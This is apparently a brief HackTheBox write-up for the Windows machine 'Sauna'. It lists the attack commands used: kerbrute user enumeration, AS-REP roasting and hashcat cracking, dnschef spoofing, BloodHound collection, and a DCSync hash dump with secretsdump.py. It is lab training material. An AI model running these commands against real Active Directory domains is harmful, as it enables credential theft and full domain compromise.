Sauna @ HackTheBox
Sauna is a 20-point Windows Machine on HackTheBox. For user, we bruteforce usernames and then use ASREP-Roasting to obtain the hash of one the users. For root, we find the logon password for an account that has DCSync privileges and then use secretsdump.py to execute the attack. My walkthrough is available on youtube.
Notes
Kerbrute
1
kerbrute userenum -d egotistical-bank.local xato-net-10-million-usernames.txt --dc sauna.htb
ASREPRoast
1
GetNPUsers.py egotistical-bank.local/ -usersfile users.txt -format hashcat -outputfile asrep.txt -dc-ip sauna.htb
Hashcat
1
hashcat -m 18200 asrep.txt rockyou.txt
Dnschef
1
sudo sh -c 'python3 dnschef.py --fakeip 10.10.10.175 --fakedomains egotistical-bank.local -q'
Bloodhound
1
bloodhound-python -c all -u svc_loanmgr -p 'password' -d egotistical-bank.local -dc egotistical-bank.local -ns 127.0.0.1
Secretsdump
1
secretsdump.py 'egotistical-bank/svc_loanmgr:password@sauna.htb'
This post is licensed under CC BY 4.0 by the author.